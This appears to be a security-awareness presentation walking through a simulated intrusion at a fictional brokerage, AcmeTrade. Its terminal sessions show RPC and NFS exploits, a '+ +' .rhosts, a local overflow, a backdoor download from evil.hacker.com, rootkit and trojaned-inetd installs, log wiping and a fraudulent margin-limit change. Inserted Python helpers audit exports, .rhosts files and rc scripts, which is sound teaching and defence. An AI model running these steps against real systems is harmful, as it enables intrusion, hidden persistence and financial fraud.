Contents
-
Attack example
-
-
WHOIS Search
-
ACMETRADE.COM
-
Registrant:
   Acmetrade.com, Inc. (ACMETRADE-DOM)
   6600 Peachtree Dunwoody Road
   Atlanta, GA 30338

   Domain Name: ACMETRADE.COM

   Administrative Contact:
      Vaughn, Danon (ES2394)   dvaughn@ACMETRADE.COM
      (678)443-6000 (FAX) (678) 443-6476
   Technical Contact, Zone Contact:
      Bergman, Bret (ET2324)   bbergman@ACMETRADE.COM
      (678)443-6100 (FAX) (678) 443-6208
   Billing Contact:
      Fields, Hope (ET3427)    hfields@ACMETRADE.COM
      (678)443-6101 (FAX) (678) 443-6401

   Record last updated on 27-Jul-99.
   Record created on 06-Mar-98.
   Database last updated on 4-Oct-99 09:09:01 EDT.

   Domain servers in listed order:
   dns.acmetrade.com    208.21.2.67
   www.acmetrade.com    208.21.2.10
   www1.acmetrade.com   208.21.2.12
   www2.acmetrade.com   208.21.2.103

http://www.networksolutions.com/cgi-bin/whois/whois/?STRING=acmetrade.com
-
hacker:/export/home/hacker> ./rpcscan dns.acmetrade.com cmsd
Scanning dns.acmetrade.com for program 100068
cmsd is on port 33505
hacker:/export/home/hacker>
-
-
-
hacker:/export/home/hacker> id
uid=1002(hacker) gid=10(staff)
hacker:/export/home/hacker> uname -a
SunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc SUNW,UltraSPARC-IIi-Engine
hacker:/export/home/hacker> ./cmsd dns.acmetrade.com
using source port 53
rtable_create worked
Exploit successful. Portshell created on port 33505
hacker:/export/home/hacker> telnet dns.acmetrade.com 33505
Trying 208.21.2.67...
Connected to dns.acmetrade.com.
Escape character is '^]'.
# id
uid=0(root) gid=0(root)
# uname -a
SunOS dns 5.5.1 Generic_103640-24 sun4m sparc SUNW,SPARCstation-5
#
-
# nslookup
Default Server: dns.acmetrade.com
Address: 208.21.2.67

> ls acmetrade.com
[dns.acmetrade.com]
 www.acmetrade.com           208.21.2.10
 www1.acmetrade.com          208.21.2.12
 www2.acmetrade.com          208.21.2.103
 margin.acmetrade.com        208.21.4.10
 marketorder.acmetrade.com   208.21.2.62
 deriv.acmetrade.com         208.21.2.25
 deriv1.acmetrade.com        208.21.2.13
 bond.acmetrade.com          208.21.2.33
 ibd.acmetrade.com           208.21.2.27
 fideriv.acmetrade.com       208.21.4.42
 backoffice.acmetrade.com    208.21.4.45
 wiley.acmetrade.com         208.21.2.29
 bugs.acmetrade.com          208.21.2.89
 fw.acmetrade.com            208.21.2.94
 fw1.acmetrade.com           208.21.2.21
Received 15 records.
> ^D
#
-
# rpcinfo -p www.acmetrade.com | grep mountd
   100005    1   udp    643  mountd
   100005    1   tcp    647  mountd
# showmount -e www.acmetrade.com
export list for www.acmetrade.com:
/usr/local    server2, server3, server4
/export/home  sunspot
# rpcinfo -p www1.acmetrade.com | grep mountd
   100005    1   udp    643  mountd
   100005    1   tcp    647  mountd
# showmount -e www1.acmetrade.com
export list for www1.acmetrade.com:
/data1        server2
/a            engineering
/b            engineering
/c            engineering
/export/home  (everyone)
#
-
nfs
-
nfsshell.c
-
# nfsshell
nfs> host www1.acmetrade.com
Open www1.acmetrade.com[208.21.1.12] (mountd) using UDP/IP
nfs> export
Export list for www1.acmetrade.com:
/data1        server2
/a            engineering
/b            engineering
/c            engineering
/export/home  (everyone)
nfs> mount /export/home
Mount www1.acmetrade.com[208.21.2.12]:/export/home
- protocol: UDP/IP
- transfer size: 8192 bytes
nfs> ls
bill  bob  celeste  chuck  dan  dave  jenn  zack
nfs> ls -l bob
drwxr-xr-x  2 201  1  1024 May  4  1999 bob
nfs> uid 201
nfs> gid 1
nfs> cd bob
nfs>
-
nfs> status
User id      : 201
Group id     : 1
Remote host  : 'www1.acmetrade.com'
Mount path   : '/export/home'
Transfer size: 8192
nfs> !sh
$ echo "+ +" > .rhosts
$ exit
nfs> put .rhosts
nfs> cat .rhosts
+ +
nfs> exit
# rlogin -l bob www1.acmetrade.com
Last login: Wed Mar 3 10:46:52 from somebox.internal.acmetrade.com
www1% whoami
bob
www1% pwd
/export/home/bob
www1% uname -a
SunOS www1.acmetrade.com 5.5.1 Generic_103640-24 sun4d SUNW,SPARCserver-1000
www1% cat .rhosts
+ +
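The nfsshell session above needs two things: a home tree exported with no client restriction, and a server that accepts whatever uid the client claims in AUTH_UNIX (root squashing does nothing for uid 201). Once a file can be written as bob, a "+ +" .rhosts hands out a password-less rlogin. The following audit helper is an added example, not from the presentation; it parses showmount -e output and .rhosts contents constructed from the lines in the deck, and the same .rhosts check also catches the host-based root trust found in /.rhosts on backoffice later in the deck.

```python
"""Audit helper for the two weaknesses nfsshell abused above: an NFS home
tree exported to the world, and a .rhosts that trusts any host and user.
Added example; the sample inputs are constructed from the output shown
in the presentation, not captured from a live system."""
import re

SHOWMOUNT_OUTPUT = """\
Export list for www1.acmetrade.com:
/data1        server2
/a            engineering
/b            engineering
/c            engineering
/export/home  (everyone)
"""

HOME_PREFIXES = ("/export/home", "/home", "/users")

def parse_showmount(text):
    """Return {export_path: [client, ...]} from `showmount -e` output."""
    exports = {}
    for line in text.splitlines():
        if not line.startswith("/"):
            continue   # skip the "Export list for ..." header
        path, _, clients = line.partition(" ")
        exports[path] = [c.strip() for c in clients.split(",") if c.strip()]
    return exports

def world_exports(exports):
    """Exports with no client restriction at all."""
    return sorted(p for p, clients in exports.items() if "(everyone)" in clients)

def risky_exports(exports):
    """World exports plus any export of a home tree: .rhosts, shell rc files
    and (today) ssh keys live there, so a write as any uid is a login."""
    return sorted(
        p for p, clients in exports.items()
        if "(everyone)" in clients or p.startswith(HOME_PREFIXES)
    )

RHOSTS_LINE = re.compile(r"^\s*(?P<host>\S+)(?:\s+(?P<user>\S+))?\s*$")

def rhosts_findings(path, content):
    """Flag wildcard and root trust entries in a .rhosts / hosts.equiv file.
    Returns (path, lineno, description) tuples."""
    findings = []
    for lineno, line in enumerate(content.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = RHOSTS_LINE.match(line)
        if not m:
            continue
        host, user = m.group("host"), m.group("user")
        if host == "+" and user == "+":
            findings.append((path, lineno, "any user from any host"))
        elif host == "+":
            findings.append((path, lineno, "user %s from any host" % (user or "same")))
        elif user == "+":
            findings.append((path, lineno, "any user from %s" % host))
        elif user == "root":
            findings.append((path, lineno, "root from %s" % host))
    return findings

def audit(showmount_text, rhosts_files):
    """rhosts_files: {path: content}.  Returns (risky exports, rhosts findings)."""
    exports = parse_showmount(showmount_text)
    findings = []
    for path, content in rhosts_files.items():
        findings.extend(rhosts_findings(path, content))
    return risky_exports(exports), findings
```

In the deck the exploitable entry is a single line, "/export/home (everyone)"; the same parser over the www.acmetrade.com listing reports nothing for /usr/local but still flags /export/home because it is a home tree, which is the right call even when the client list looks restrictive, since mountd checks the client hostname, not the uid the client presents.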
-
-
-
www1% ls -la /usr/bin/eject
-r-sr-xr-x  1 root  bin  13144 Jul 15  1997 /usr/bin/eject*
www1% gcc -o eject_overflow eject_overflow.c
www1% ./eject_overflow
Jumping to address 0xeffff630 B[364] E[400] SO[400]
# whoami
root
# ftp evil.hacker.com
Connected to evil.hacker.com.
220 evil.hacker.com FTP server (HackerOS) ready.
Name (evil.hacker.com:root): hacker
331 Password required for hacker.
Password: eye0wnu
230 User hacker logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
-
ftp> cd solaris_backdoors
250 CWD command successful.
ftp> get solaris_backdoor.tar.gz
200 PORT command successful.
150 Binary data connection for out 3.1.33.7,1152).
226 Transfer complete.
152323 bytes sent in 31.942233 secs (4.7Kbytes/sec)
ftp> quit
# cd /tmp/my_tools
# gunzip module_backdoor.tar.gz
# tar -xf module_backdoor.tar
#
-
# cd /tmp/my_tools/module_backdoor
# ./configure
Enter directories and filenames to hide from ls, find, du: ... backdoor
Enter class C network to hide from netstat: 3.1.33.0
Enter process names to hide from ps and lsof: sniffer
creating config.h...
# make
gcc -c backdoor.c
ld -o backdoor -r backdoor.o
gcc -o installer installer.c
# ls
Makefile  backdoor  backdoor.c  backdoor.o  config.h  configure  installer  installer.c
# modload backdoor
# ./installer -d /usr/local/share/...
Adding directory...
Fixing last modified time...
Fixing last accessed time...
#
-
# ls -la /usr/local/share/...
...: No such file or directory
# ./installer backdoor /usr/local/share/.../backdoor
Installing file...
Fixing last modified time...
Fixing last accessed time...
# echo "/usr/sbin/modload /usr/local/share/.../backdoor" >> /etc/init.d/utmpd
# cd ..
# rm -rf module_backdoor
# ls
inetd_backdoor/  logedit  sniffer
# ./installer sniffer /usr/local/share/.../sniffer
Installing file...
Fixing last modified time...
Fixing last accessed time...
# ls /usr/local/share/.../sniffer
/usr/local/share/.../sniffer: No such file or directory
# cd /usr/local/share/...
# ./sniffer > out &
# ps -aef | grep sniffer
#
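Two things in the slides above survive the module's hiding: the link count of /usr/local/share still counts the hidden "..." directory even though readdir no longer lists it, and the persistence line appended to /etc/init.d/utmpd is plain text in an rc script. The checks below are an added example, not part of the presentation; the rc script content is constructed, and the link-count test assumes a filesystem that keeps the classic "st_nlink = 2 + subdirectories" invariant (UFS, ext2/3/4, tmpfs), which the code detects and reports as unknown otherwise.

```python
"""Two host checks for the kernel-module backdoor installed above: a
directory whose link count says it has more subdirectories than readdir
shows (the hidden "..." directory), and an rc script that loads a module
from outside the normal kernel module paths (the line appended to
/etc/init.d/utmpd).  Added example, not from the original presentation;
the init script text is constructed."""
import os
import re
import tempfile

def hidden_subdir_hint(path):
    """On UFS/ext-style filesystems a directory's st_nlink is 2 plus the
    number of subdirectories in it.  A kernel hook that filters getdents()
    hides entries from ls/find/du but does not rewrite st_nlink, so a
    positive gap is a hint that something is hidden.  Returns None when the
    filesystem does not keep that invariant (st_nlink < 2, e.g. btrfs)."""
    st = os.stat(path)
    if st.st_nlink < 2:
        return None
    visible = 0
    with os.scandir(path) as it:
        for entry in it:
            if entry.is_dir(follow_symlinks=False):
                visible += 1
    return st.st_nlink - 2 - visible

# where Solaris normally keeps loadable modules
STANDARD_MODULE_DIRS = ("/kernel/", "/usr/kernel/", "/platform/")
MODLOAD_RE = re.compile(r"\bmodload\s+(?:-\S+\s+)*(\S+)")

def suspicious_modload_lines(script_text):
    """Return (lineno, module_path) for modload calls whose module lives
    outside the standard module directories.  Comments are ignored."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        code = line.split("#", 1)[0]
        for m in MODLOAD_RE.finditer(code):
            module = m.group(1)
            if not module.startswith(STANDARD_MODULE_DIRS):
                findings.append((lineno, module))
    return findings

# constructed rc script: a plausible utmpd start script with the deck's
# persistence line appended at the bottom
SAMPLE_RC_SCRIPT = """\
#!/sbin/sh
case "$1" in
'start')
        /usr/lib/utmpd
        ;;
esac
/usr/sbin/modload /usr/local/share/.../backdoor
"""

def scan_rc_dir(rc_dir):
    """Run the modload check over every regular file in an rc directory."""
    results = {}
    for name in sorted(os.listdir(rc_dir)):
        full = os.path.join(rc_dir, name)
        if os.path.isfile(full):
            with open(full, errors="replace") as fh:
                hits = suspicious_modload_lines(fh.read())
            if hits:
                results[full] = hits
    return results

def demo():
    """Self-check on a scratch directory: two visible subdirs, no gap."""
    with tempfile.TemporaryDirectory() as d:
        os.mkdir(os.path.join(d, "a"))
        os.mkdir(os.path.join(d, "b"))
        gap = hidden_subdir_hint(d)
    return gap, suspicious_modload_lines(SAMPLE_RC_SCRIPT)
```

A gap of zero is not a clean bill of health: a module that also hooks stat() can lie about st_nlink, and a hidden regular file (the sniffer binary) never affects the count. The durable check is the one the deck's attacker cannot defeat from inside the compromised host, which is to compare the live view against an offline mount of the disk or a file-integrity baseline taken before the compromise.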
-
# netstat
TCP
   Local Address          Remote Address       Swind Send-Q Rwind Recv-Q  State
-------------------- -------------------- ----- ------ ----- ------ -------
208.21.2.10.1023     208.21.0.19.2049      8760      0  8760    648 ESTABLISHED
208.21.2.10.1022     208.21.0.19.2049      8760      0  8760      0 ESTABLISHED
208.21.2.10.2049     208.21.0.13.1003      8760      0  8760      0 ESTABLISHED
# cd /tmp/my_tools
# cd inetd_backdoor
# ls
config.h  configure  inetd.c  installer.c
# ./configure
Enter port for hidden shell: 31337
creating config.h...
creating Makefile...
# make
gcc -s -DSYSV=4 -D__svr4__ -DSOLARIS -o inetd inetd.c -lnsl -lsocket -lresolv
gcc -o installer installer.c
# installer inetd /usr/sbin/inetd
Installing file...
Fixing last modified time...
Fixing last accessed time...
-
# ps -aef | grep inetd
    root   179     1  0   May 10 ?        1:26 /usr/sbin/inetd -s
# kill -9 179
# /usr/sbin/inetd -s &
#
hacker:/export/home/hacker> telnet www1.acmetrade.com 31337
Trying 208.21.2.12...
Escape character is '^]'.
Granting rootshell...
# hostname
www1
# whoami
root
# exit
Connection closed by foreign host.
hacker:/export/home/hacker>
-
hacker:/export/home/hacker> ftp www1.acmetrade.com
Connected to www1
220 www1.acmetrade.com FTP service (Version 2.5).
Name: root
331 Password required for root.
Password: *******
230 User root logged in.
Remote system type is Unix.
ftp> cd /usr/local/httpd
ftp> put backdoor.html securelogin.html
200 PORT command successful.
150 Opening BINARY mode data connection for index.html
226 Transfer complete.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 10
-rwxr-xr-x  9 root  other  1024 Aug 17 17:07 .
-rwxr-xr-x  9 root  other  1024 Aug 17 17:07 ..
-rwxr-xr-x  2 www   www    2034 Aug 17 17:07 index.html
-rwxr-xr-x  2 www   www    1244 Aug 17 17:07 securelogin.html
-rwxr-xr-x  2 www   www    1024 Aug 17 17:07 image2.gif
-rwxr-x--x  6 www   www     877 Aug 17 17:07 title.gif
-rwxr-xr-x  2 www   www    1314 Aug 17 17:07 frontpage.jpg
226 Transfer complete.
bytes received in 0.82 seconds (0.76 Kbytes/sec)
ftp> quit
-
# rpcinfo -p backoffice.acmetrade.com
   program vers proto   port  service
    100000    4   tcp    111  rpcbind
    100000    3   tcp    111  rpcbind
    100000    2   tcp    111  rpcbind
    100000    4   udp    111  rpcbind
    100000    3   udp    111  rpcbind
    100000    2   udp    111  rpcbind
    100004    2   udp    753  ypserv
    100004    1   udp    753  ypserv
    100004    1   tcp    754  ypserv
    100004    2   tcp  32771  ypserv
1073741824    2   udp  32772
    100007    3   udp  32779  ypbind
    100007    2   udp  32779  ypbind
    100007    1   udp  32779  ypbind
    100007    3   tcp  32772  ypbind
    100007    2   tcp  32772  ypbind
    100007    1   tcp  32772  ypbind
    100011    1   udp  32781  rquotad
    100068    2   udp  32783
    100068    3   udp  32783
    100068    4   udp  32783
    100068    5   udp  32783
    100024    1   udp  32784  status
    100024    1   tcp  32777  status
    100021    1   udp   4045  nlockmgr
    100021    2   udp   4045  nlockmgr
    100021    3   udp   4045  nlockmgr
    100021    4   udp   4045  nlockmgr
    100021    1   tcp   4045  nlockmgr
    100021    2   tcp   4045  nlockmgr
    100021    3   tcp   4045  nlockmgr
    100021    4   tcp   4045  nlockmgr
    100005    1   udp  33184  mountd
    100005    2   udp  33184  mountd
    100005    3   udp  33184  mountd
    100005    1   tcp  32787  mountd
    100005    2   tcp  32787  mountd
    100005    3   tcp  32787  mountd
    100083    1   tcp  32773
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100227    2   udp   2049  nfs_acl
    100227    3   udp   2049  nfs_acl
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100227    2   tcp   2049  nfs_acl
    100227    3   tcp   2049  nfs_acl
# grep ttdbserverd /etc/inetd.conf
100083/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd
# rpcinfo -p backoffice.acmetrade.com | grep 100083
    100083    1   tcp  32773
# cd /tmp/mytools/warez
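Note what the attacker had to do above: 100068 and 100083 show up in rpcinfo output with an empty service column, because rpcinfo takes names from the local /etc/rpc and cmsd and ttdbserverd are not in it on that box, so a grep of inetd.conf was needed to confirm 100083 is rpc.ttdbserverd. An unnamed program number is a registered service that nobody bothered to label, not an absence. The parser below is an added example, not part of the presentation; it names the blanks from a built-in table and lists the two services the attack chain exploits. The sample output is constructed from lines shown in the deck.

```python
"""Parse `rpcinfo -p` output and name the program numbers it leaves blank.
rpcinfo labels services from the local /etc/rpc, so cmsd (100068) and
ttdbserverd (100083) appear unnamed on backoffice above even though both
are registered.  Added example; the sample output is constructed from
lines in the deck."""

RPCINFO_SAMPLE = """\
   program vers proto   port  service
    100000    2   tcp    111  rpcbind
    100004    2   udp    753  ypserv
1073741824    2   udp  32772
    100068    2   udp  32783
    100068    5   udp  32783
    100005    1   tcp  32787  mountd
    100083    1   tcp  32773
    100003    2   tcp   2049  nfs
"""

# program numbers that matter for this deck; a fuller list lives in /etc/rpc
KNOWN_PROGRAMS = {
    100000: "rpcbind", 100003: "nfs", 100004: "ypserv", 100005: "mountd",
    100007: "ypbind", 100011: "rquotad", 100021: "nlockmgr", 100024: "status",
    100068: "cmsd", 100083: "ttdbserverd", 100227: "nfs_acl",
}

# the two RPC services the attack chain uses for remote root
EXPLOITED = {100068: "rpc.cmsd", 100083: "rpc.ttdbserverd"}

def parse_rpcinfo(text):
    """Return one dict per line: prog, vers, proto, port, name, and whether
    rpcinfo itself supplied the name or we filled it from KNOWN_PROGRAMS."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or not parts[0].isdigit():
            continue   # header line or blank
        prog = int(parts[0])
        named = len(parts) > 4
        entries.append({
            "prog": prog,
            "vers": int(parts[1]),
            "proto": parts[2],
            "port": int(parts[3]),
            "name": parts[4] if named else KNOWN_PROGRAMS.get(prog, ""),
            "named_by_rpcinfo": named,
        })
    return entries

def endpoints(entries, prog):
    """Distinct (proto, port) pairs a program is reachable on."""
    return sorted({(e["proto"], e["port"]) for e in entries if e["prog"] == prog})

def unnamed_programs(entries):
    """Programs rpcinfo could not name.  Each deserves a lookup, and a
    direct probe (rpcinfo -u/-t host prog) if it is not in any table."""
    return sorted({e["prog"] for e in entries if not e["named_by_rpcinfo"]})

def exploited_services(entries):
    """(prog, daemon, proto, port) for services in EXPLOITED that are registered."""
    return sorted({
        (e["prog"], EXPLOITED[e["prog"]], e["proto"], e["port"])
        for e in entries if e["prog"] in EXPLOITED
    })
```

The transient program number 1073741824 (0x40000000) is also left unnamed; numbers in that range are handed out dynamically to callback and transient servers, so the parser reports it rather than guessing, and the right follow-up is a direct probe of the port.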
-
# ./tt backoffice.acmetrade.com
Please wait for your root shell.
# hostname
backoffice
# whoami
root
# find / -type f -name .rhosts -print
/.rhosts
/export/home/chuck/.rhosts
/export/home/bill/.rhosts
/export/home/larry/.rhosts
# cat /.rhosts
fideriv.acmetrade root
ibd.acmetrade root
bugs.acmetrade root
# w
 10:20pm  up 13:15,  1 user,  load average: 0.01, 0.02, 0.03
User     tty      login@   idle    JCPU   PCPU  what
root     console  9:27am   147:52  14:41  14:14 /sbin/sh
root     pts/5    9:24pm                        /sbin/sh
# /tmp/mytools/logedit root pts/5
# w
 10:20pm  up 13:15,  1 user,  load average: 0.01, 0.02, 0.03
User     tty      login@   idle    JCPU   PCPU  what
root     console  9:27am   147:52  14:41  14:14 /sbin/sh
#
-
# sqlplus oracle/oracle
SQL> describe customers
 Name                Null?    Type
 ------------------  -------  ------------
 LNAME               NOT NULL VARCHAR2(20)
 FNAME               NOT NULL VARCHAR2(15)
 ADDR1               NOT NULL VARCHAR2(30)
 ZIP                 NOT NULL NUMBER(5)
 PHONE               NOT NULL CHAR(12)
 ACCOUNT_NUM         NOT NULL NUMBER(12)
 BALANCE             NOT NULL NUMBER(12)
 MARGIN_LIMIT        NOT NULL NUMBER(12)
 ACCT_OPEN           NOT NULL DATE

SQL> select LNAME, FNAME, ACCOUNT_NUM, MARGIN_LIMIT from customers where LNAME = 'Gerulski';

LNAME                FNAME          ACCOUNT_NUM  MARGIN_LIMIT
-------------------- -------------  -----------  ------------
Gerulski             David          5820981      50000.00

SQL> update customers set MARGIN_LIMIT = 500000.00 where LNAME = 'Gerulski';

SQL> select LNAME, MARGIN_LIMIT from customers where LNAME = 'Gerulski';

LNAME                MARGIN_LIMIT
-------------------- ------------
Gerulski             500000.00

SQL> exit
-
-
Anatomy of the Attack
[Network diagram: AcmeTrade's network, with a Filtering Router, a UNIX Firewall, a DNS Server (UNIX, attacked via rpc.cmsd), a Web Server (UNIX, attacked via nfs / eject), NT Clients & Workstations, and internal UNIX and NT hosts (attacked via tooltalk / oracle).]
-
What is Vulnerable?

IT Infrastructure: Firewall, Router, E-Mail Server, Web Server, Servers, Clients & Workstations, Network

Applications: E-Commerce, Web Server, E-Mail Server, SAP, Peoplesoft, Web Browsers

Databases: Oracle, Microsoft SQL Server, Sybase

Operating Systems: AIX, Solaris, HP-UX, Windows 95 & NT

Networks: TCP/IP, Netware